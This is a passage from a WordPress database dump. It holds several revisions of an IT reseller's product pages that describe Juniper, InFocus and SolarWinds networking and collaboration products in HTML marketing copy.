Ethernet Switches</h4>\r\nThese cloud-grade switches are designed for the converged enterprise branch, campus, and data center, and for service providers. They address growing enterprise demands for high availability, unified communications, and virtualization.\r\n<h4>QFX Series</h4>\r\nQFX Series switches satisfy the needs of todayâ€™s most demanding enterprise and service provider data center environments. This high-performance, high-density platform is designed for top-of-rack, end-of-row, and spine-and-core aggregation deployments.\r\n<h4>Data Center Switching Architectures</h4>\r\nJuniper switches provide the high-performance, high-density platforms required to build innovative data center fabrics that scale to thousands of ports.\r\n\r\n&nbsp;\r\n<h3>Wireless</h3>\r\n<h4>Aerohive Wireless LANs</h4>\r\nCloud-managed Wi-Fi access points, available from Juniper, that boost coverage and capacity. A distributed control mechanism eliminates the need for separate wireless controllers, streamlining your wireless infrastructure.\r\n<h4>Mist Learning Wireless LAN</h4>\r\nA machine learning-based wireless LAN solution that improves your Wi-Fi management and provides real-time information on end users and their mobile devices.\r\n\r\n&nbsp;\r\n<h3>Routers</h3>\r\n<h4>MX Series 5G Universal Routing Platform</h4>\r\nA robust portfolio of SDN-enabled routing platforms that provide industry-leading system capacity, density, and performance with unparalleled longevity. MX Series routers are key to digital transformation for service providers, cloud operators, and enterprises.\r\n<h4>PTX Series Packet Transport Routers</h4>\r\nPTX Series routers form the foundation of the Converged SupercoreÂ® architecture, providing performance, optical transport integration, and elegant deployment. They support high-density 100GbE environments, with energy efficiency of less than half a watt per Gbps.\r\n<h4>ACX Series Universal Metro Routers</h4>\r\nMEF CE 2.0-compliant hardened routers address use cases of business Ethernet services, residential aggregation, small cell, mobile backhaul, and industrial field area networks.\r\n<h4>CTP Series Circuit to Packet Platforms</h4>\r\nThese platforms give time-division multiplexing (TDM) and serial and analog circuit-based applications reliable and efficient access to next-generation IP networks with all of their cost, redundancy, and efficiency advantages.\r\n<h4>T4000 Core Router</h4>\r\nThe T4000 Core Router is a true multiservice core system that delivers reliable and flexible core backbone architecture to carry a wide breadth of services over a common IP/MPLS infrastructure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Juniper','','inherit','closed','closed','','1533-revision-v1','','','2018-12-17 14:29:28','2018-12-17 06:29:28','',1533,'https://bintara.com.my/blog/2018/12/17/1533-revision-v1/',0,'revision','',0),(2290,1,'2018-12-17 14:42:55','2018-12-17 06:42:55','','419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero','','inherit','closed','closed','','419dcbae80ab7e36103599ac5e712aca_infocus-jtouch-hero','','','2018-12-17 14:42:55','2018-12-17 06:42:55','',1531,'https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero.png',0,'attachment','image/png',0),(2291,1,'2018-12-17 14:48:13','2018-12-17 06:48:13','<strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong>\r\n<h3>Mondopad</h3>\r\nFlexible, collaborative touchscreen solutions that work the way you do.\r\n<h4>Collaboration that Fits</h4>\r\nThe Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Ultra</h5>\r\nThe complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.\r\n\r\n</div>\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Launch</h5>\r\nFully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.\r\n\r\n</div>\r\n<div class=\"description-triple-column pr-0 large-4 small-12\">\r\n<h5>Mondopad Core</h5>\r\nThe easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.\r\n\r\n</div>\r\n<h3></h3>\r\n<h3>JTouch</h3>\r\n<h5>Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h5>\r\n<div class=\"headline\">\r\n\r\nWhether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.\r\n<h4><img class=\"alignnone wp-image-2290 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>\r\n<h4>Key Features</h4>\r\n<ul>\r\n 	<li>Incredibly sharp 4K or 1080p HD resolution</li>\r\n 	<li>Content is interactive, bright and crisp in any light</li>\r\n 	<li>Run all your apps, even the older ones, with touch</li>\r\n 	<li>Accurate and responsive touch overlay with multi-touch capability</li>\r\n 	<li>Wirelessly cast from any device, browse the web, or view documents</li>\r\n 	<li>Create and share on an interactive whiteboard</li>\r\n 	<li>No calibration required</li>\r\n 	<li>Available in sizes ranging from 55- to 86-inches</li>\r\n</ul>\r\n<h3></h3>\r\n<h3>Projectors</h3>\r\nOffice to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.\r\n<h4>Classroom Projectors</h4>\r\nIncredible Value and Connectivity\r\n<h4>Meeting Room</h4>\r\nSuperior Performance and Quality for Business\r\n<h4>Portable Projectors</h4>\r\nCompact, Lightweight, Powerful\r\n<h4>Large Venue Projectors</h4>\r\nHigh-performance projectors\r\n\r\n</div>\r\n<h3></h3>\r\n<h3 class=\"lead_text--secondary_headline\">Jupiter by InFocus</h3>\r\n<p class=\"lead_text--paragraph\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p>\r\n&nbsp;\r\n<h3>ConX Cloud</h3>\r\nConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-17 14:48:13','2018-12-17 06:48:13','',1531,'https://bintara.com.my/blog/2018/12/17/1531-revision-v1/',0,'revision','',0),(2295,1,'2018-12-17 14:54:23','2018-12-17 06:54:23','<strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong>\r\n<h3></h3>\r\n<h3>Mondopad</h3>\r\nFlexible, collaborative touchscreen solutions that work the way you do.\r\n<h4>Collaboration that Fits</h4>\r\nThe Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Ultra</h5>\r\nThe complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.\r\n\r\n</div>\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Launch</h5>\r\nFully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.\r\n\r\n</div>\r\n<div class=\"description-triple-column pr-0 large-4 small-12\">\r\n<h5>Mondopad Core</h5>\r\nThe easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.\r\n\r\n</div>\r\n<h3></h3>\r\n<h3>JTouch</h3>\r\n<h5>Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h5>\r\n<div class=\"headline\">\r\n\r\nWhether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.\r\n<h4><img class=\"alignnone wp-image-2290 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>\r\n<h4>Key Features</h4>\r\n<ul>\r\n 	<li>Incredibly sharp 4K or 1080p HD resolution</li>\r\n 	<li>Content is interactive, bright and crisp in any light</li>\r\n 	<li>Run all your apps, even the older ones, with touch</li>\r\n 	<li>Accurate and responsive touch overlay with multi-touch capability</li>\r\n 	<li>Wirelessly cast from any device, browse the web, or view documents</li>\r\n 	<li>Create and share on an interactive whiteboard</li>\r\n 	<li>No calibration required</li>\r\n 	<li>Available in sizes ranging from 55- to 86-inches</li>\r\n</ul>\r\n<h3></h3>\r\n<h3>Projectors</h3>\r\nOffice to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.\r\n<h4>Classroom Projectors</h4>\r\nIncredible Value and Connectivity\r\n<h4>Meeting Room</h4>\r\nSuperior Performance and Quality for Business\r\n<h4>Portable Projectors</h4>\r\nCompact, Lightweight, Powerful\r\n<h4>Large Venue Projectors</h4>\r\nHigh-performance projectors\r\n\r\n</div>\r\n<h3></h3>\r\n<h3>Jupiter by InFocus</h3>\r\n<p class=\"lead_text--paragraph\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p>\r\n&nbsp;\r\n<h3>ConX Cloud</h3>\r\nConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-17 14:54:23','2018-12-17 06:54:23','',1531,'https://bintara.com.my/blog/2018/12/17/1531-revision-v1/',0,'revision','',0),(2292,1,'2018-12-17 14:49:25','2018-12-17 06:49:25','<strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong>\r\n<h3></h3>\r\n<h3>Mondopad</h3>\r\nFlexible, collaborative touchscreen solutions that work the way you do.\r\n<h4>Collaboration that Fits</h4>\r\nThe Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Ultra</h5>\r\nThe complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.\r\n\r\n</div>\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Launch</h5>\r\nFully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.\r\n\r\n</div>\r\n<div class=\"description-triple-column pr-0 large-4 small-12\">\r\n<h5>Mondopad Core</h5>\r\nThe easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.\r\n\r\n</div>\r\n<h3></h3>\r\n<h3>JTouch</h3>\r\n<h5>Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h5>\r\n<div class=\"headline\">\r\n\r\nWhether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.\r\n<h4><img class=\"alignnone wp-image-2290 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>\r\n<h4>Key Features</h4>\r\n<ul>\r\n 	<li>Incredibly sharp 4K or 1080p HD resolution</li>\r\n 	<li>Content is interactive, bright and crisp in any light</li>\r\n 	<li>Run all your apps, even the older ones, with touch</li>\r\n 	<li>Accurate and responsive touch overlay with multi-touch capability</li>\r\n 	<li>Wirelessly cast from any device, browse the web, or view documents</li>\r\n 	<li>Create and share on an interactive whiteboard</li>\r\n 	<li>No calibration required</li>\r\n 	<li>Available in sizes ranging from 55- to 86-inches</li>\r\n</ul>\r\n<h3></br></h3>\r\n<h3>Projectors</h3>\r\nOffice to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.\r\n<h4>Classroom Projectors</h4>\r\nIncredible Value and Connectivity\r\n<h4>Meeting Room</h4>\r\nSuperior Performance and Quality for Business\r\n<h4>Portable Projectors</h4>\r\nCompact, Lightweight, Powerful\r\n<h4>Large Venue Projectors</h4>\r\nHigh-performance projectors\r\n\r\n</div>\r\n<h3></h3>\r\n<h3 class=\"lead_text--secondary_headline\">Jupiter by InFocus</h3>\r\n<p class=\"lead_text--paragraph\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p>\r\n&nbsp;\r\n<h3>ConX Cloud</h3>\r\nConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-17 14:49:25','2018-12-17 06:49:25','',1531,'https://bintara.com.my/blog/2018/12/17/1531-revision-v1/',0,'revision','',0),(2294,1,'2018-12-17 14:53:14','2018-12-17 06:53:14','<strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong>\r\n<h3></h3>\r\n<h3>Mondopad</h3>\r\nFlexible, collaborative touchscreen solutions that work the way you do.\r\n<h4>Collaboration that Fits</h4>\r\nThe Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Ultra</h5>\r\nThe complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.\r\n\r\n</div>\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Launch</h5>\r\nFully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.\r\n\r\n</div>\r\n<div class=\"description-triple-column pr-0 large-4 small-12\">\r\n<h5>Mondopad Core</h5>\r\nThe easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.\r\n\r\n</div>\r\n<h3></h3>\r\n<h3>JTouch</h3>\r\n<h5>Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h5>\r\n<div class=\"headline\">\r\n\r\nWhether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.\r\n<h4><img class=\"alignnone wp-image-2290 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>\r\n<h4>Key Features</h4>\r\n<ul>\r\n 	<li>Incredibly sharp 4K or 1080p HD resolution</li>\r\n 	<li>Content is interactive, bright and crisp in any light</li>\r\n 	<li>Run all your apps, even the older ones, with touch</li>\r\n 	<li>Accurate and responsive touch overlay with multi-touch capability</li>\r\n 	<li>Wirelessly cast from any device, browse the web, or view documents</li>\r\n 	<li>Create and share on an interactive whiteboard</li>\r\n 	<li>No calibration required</li>\r\n 	<li>Available in sizes ranging from 55- to 86-inches</li>\r\n</ul>\r\n<h3></br></h3>\r\n<h3>Projectors</h3>\r\nOffice to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.\r\n<h4>Classroom Projectors</h4>\r\nIncredible Value and Connectivity\r\n<h4>Meeting Room</h4>\r\nSuperior Performance and Quality for Business\r\n<h4>Portable Projectors</h4>\r\nCompact, Lightweight, Powerful\r\n<h4>Large Venue Projectors</h4>\r\nHigh-performance projectors\r\n\r\n</div>\r\n<h3></br></h3>\r\n<h3 class=\"lead_text--secondary_headline\">Jupiter by InFocus</h3>\r\n<p class=\"lead_text--paragraph\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p>\r\n&nbsp;\r\n<h3>ConX Cloud</h3>\r\nConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-17 14:53:14','2018-12-17 06:53:14','',1531,'https://bintara.com.my/blog/2018/12/17/1531-revision-v1/',0,'revision','',0),(2293,1,'2018-12-17 14:50:06','2018-12-17 06:50:06','<strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong>\r\n<h3></h3>\r\n<h3>Mondopad</h3>\r\nFlexible, collaborative touchscreen solutions that work the way you do.\r\n<h4>Collaboration that Fits</h4>\r\nThe Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Ultra</h5>\r\nThe complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.\r\n\r\n</div>\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Launch</h5>\r\nFully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.\r\n\r\n</div>\r\n<div class=\"description-triple-column pr-0 large-4 small-12\">\r\n<h5>Mondopad Core</h5>\r\nThe easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.\r\n\r\n</div>\r\n<h3></br></h3>\r\n<h3>JTouch</h3>\r\n<h5>Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h5>\r\n<div class=\"headline\">\r\n\r\nWhether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.\r\n<h4><img class=\"alignnone wp-image-2290 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>\r\n<h4>Key Features</h4>\r\n<ul>\r\n 	<li>Incredibly sharp 4K or 1080p HD resolution</li>\r\n 	<li>Content is interactive, bright and crisp in any light</li>\r\n 	<li>Run all your apps, even the older ones, with touch</li>\r\n 	<li>Accurate and responsive touch overlay with multi-touch capability</li>\r\n 	<li>Wirelessly cast from any device, browse the web, or view documents</li>\r\n 	<li>Create and share on an interactive whiteboard</li>\r\n 	<li>No calibration required</li>\r\n 	<li>Available in sizes ranging from 55- to 86-inches</li>\r\n</ul>\r\n<h3></h3>\r\n<h3>Projectors</h3>\r\nOffice to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.\r\n<h4>Classroom Projectors</h4>\r\nIncredible Value and Connectivity\r\n<h4>Meeting Room</h4>\r\nSuperior Performance and Quality for Business\r\n<h4>Portable Projectors</h4>\r\nCompact, Lightweight, Powerful\r\n<h4>Large Venue Projectors</h4>\r\nHigh-performance projectors\r\n\r\n</div>\r\n<h3></h3>\r\n<h3 class=\"lead_text--secondary_headline\">Jupiter by InFocus</h3>\r\n<p class=\"lead_text--paragraph\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p>\r\n&nbsp;\r\n<h3>ConX Cloud</h3>\r\nConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-17 14:50:06','2018-12-17 06:50:06','',1531,'https://bintara.com.my/blog/2018/12/17/1531-revision-v1/',0,'revision','',0),(2296,1,'2018-12-17 14:57:29','2018-12-17 06:57:29','<strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong>\r\n<h3></h3>&nbsp;\r\n<h3>Mondopad</h3>\r\nFlexible, collaborative touchscreen solutions that work the way you do.\r\n<h4>Collaboration that Fits</h4>\r\nThe Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Ultra</h5>\r\nThe complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.\r\n\r\n</div>\r\n<div class=\"description-triple-column large-4 small-12\">\r\n<h5>Mondopad Launch</h5>\r\nFully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.\r\n\r\n</div>\r\n<div class=\"description-triple-column pr-0 large-4 small-12\">\r\n<h5>Mondopad Core</h5>\r\nThe easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.\r\n\r\n</div>\r\n<h3></h3>&nbsp;\r\n<h3>JTouch</h3>\r\n<h5>Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h5>\r\n<div class=\"headline\">\r\n\r\nWhether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.\r\n<h4><img class=\"alignnone wp-image-2290 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>\r\n<h4>Key Features</h4>\r\n<ul>\r\n 	<li>Incredibly sharp 4K or 1080p HD resolution</li>\r\n 	<li>Content is interactive, bright and crisp in any light</li>\r\n 	<li>Run all your apps, even the older ones, with touch</li>\r\n 	<li>Accurate and responsive touch overlay with multi-touch capability</li>\r\n 	<li>Wirelessly cast from any device, browse the web, or view documents</li>\r\n 	<li>Create and share on an interactive whiteboard</li>\r\n 	<li>No calibration required</li>\r\n 	<li>Available in sizes ranging from 55- to 86-inches</li>\r\n</ul>\r\n<h3></h3>&nbsp;\r\n<h3>Projectors</h3>\r\nOffice to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.\r\n<h4>Classroom Projectors</h4>\r\nIncredible Value and Connectivity\r\n<h4>Meeting Room</h4>\r\nSuperior Performance and Quality for Business\r\n<h4>Portable Projectors</h4>\r\nCompact, Lightweight, Powerful\r\n<h4>Large Venue Projectors</h4>\r\nHigh-performance projectors\r\n\r\n</div>&nbsp;\r\n<h3></h3>\r\n<h3>Jupiter by InFocus</h3>\r\n<p class=\"lead_text--paragraph\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p>\r\n&nbsp;\r\n<h3>ConX Cloud</h3>\r\nConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-17 14:57:29','2018-12-17 06:57:29','',1531,'https://bintara.com.my/blog/2018/12/17/1531-revision-v1/',0,'revision','',0),(2297,1,'2018-12-17 15:13:28','2018-12-17 07:13:28','<h1>SolarWinds: We Make IT Look Easy</h1>\r\nWe are a leading provider of powerful and affordable IT infrastructure management software. Our products give organizations worldwide, regardless of type, size or IT infrastructure complexity, the power to monitor and manage the performance of their IT environments, whether on-premises, in the cloud, or in hybrid models.\r\n<h2>PRODUCTS</h2>\r\n<h3>NETWORK MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Network Performance MonitorÂ </strong></li>\r\n</ol>\r\nNetwork monitoring software designed to reduce network outages and improve performance.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor network monitoring</li>\r\n 	<li>Network Insights for deeper visibility</li>\r\n 	<li>Intelligent maps</li>\r\n 	<li>NetPath and PerfStack for easy troubleshooting</li>\r\n 	<li>Smarter scalability for large environments</li>\r\n 	<li>Advanced alerting</li>\r\n</ul>\r\n2.Â <strong>Network Configuration Manager</strong>\r\n\r\nAutomate network configuration management and compliance, which can help save time and optimize IT resources.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Network automation</li>\r\n 	<li>Network compliance</li>\r\n 	<li>Configuration backup</li>\r\n 	<li>Vulnerability assessment</li>\r\n 	<li>Network Insights for Cisco ASA and Cisco Nexus</li>\r\n 	<li>Integration with Network Performance Monitor</li>\r\n</ul>\r\n3.Â <strong>ipMonitor</strong>\r\n\r\nEssential up/down and performance monitoring for networks, servers, and applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor network devices, servers, and applications from one console</li>\r\n 	<li>Receive alerts for availability and performance issues</li>\r\n 	<li>Monitor network status on maps and NOC view</li>\r\n 	<li>Minimize downtime by automating remediation actions</li>\r\n 	<li>Enhance monitoring with built-in reports and dashboards</li>\r\n</ul>\r\n4.Â <strong>IP Address Manager</strong>\r\n\r\nIP address management software designed to save time and prevent costly errors.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automated IP address tracking</li>\r\n 	<li>Integrated DHCP, DNS, and IP address management</li>\r\n 	<li>IP address alerting, troubleshooting, and reporting</li>\r\n 	<li>Multi-vendor on-prem and cloud DHCP and DNS support</li>\r\n 	<li>IP Request Wizard for streamlining and automating IP address requests</li>\r\n 	<li>API support with CRUD operations for two-way integration with third-party software</li>\r\n</ul>\r\n5.Â <strong>User Device Tracker</strong>\r\n\r\nNetwork device tracking software that can locate users and devices on your network.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Quickly locate network devices</li>\r\n 	<li>Map and monitor WAPs, switches, and ports</li>\r\n 	<li>Manage switch and switch port capacity</li>\r\n 	<li>Detect rogue devices and users</li>\r\n 	<li>Turn ports on and off remotely</li>\r\n 	<li>Unified IT administration dashboard</li>\r\n</ul>\r\n6.Â <strong>NetFlow Traffic Analyzer</strong>\r\n\r\nNetFlow analyzer and bandwidth monitoring software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Bandwidth monitoring</li>\r\n 	<li>Application traffic alerting</li>\r\n 	<li>Network traffic analysis</li>\r\n 	<li>Performance Analysis Dashboard</li>\r\n 	<li>CBQoS policy optimization</li>\r\n 	<li>Malicious or malformed traffic flow identification</li>\r\n</ul>\r\n7.Â <strong>VoIP and Network Quality Manager</strong>\r\n\r\nVoIP monitoring software designed for deep critical call QoS metrics and WAN performance insights.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Real-time WAN monitoring</li>\r\n 	<li>Troubleshoot VoIP call quality problems</li>\r\n 	<li>Visual VoIP call path trace</li>\r\n 	<li>Cisco VoIP gateway and PRI trunk monitoring</li>\r\n 	<li>Cisco SIP trunk monitoring</li>\r\n 	<li>Simplify IP SLA setup</li>\r\n</ul>\r\n<h3>SYSTEM MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Virtualization Manager</strong>\r\n\r\nVirtual machine monitor designed to optimize performance and fix issues in 